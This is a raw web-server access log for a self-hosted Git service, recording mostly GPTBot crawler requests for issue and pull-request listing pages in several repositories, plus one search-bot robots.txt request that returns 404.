[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fOpcConnectionTest.csproj" [Client 74.7.227.38] [Length 21957] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:19:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:36:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:19:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:36:21 +0000] 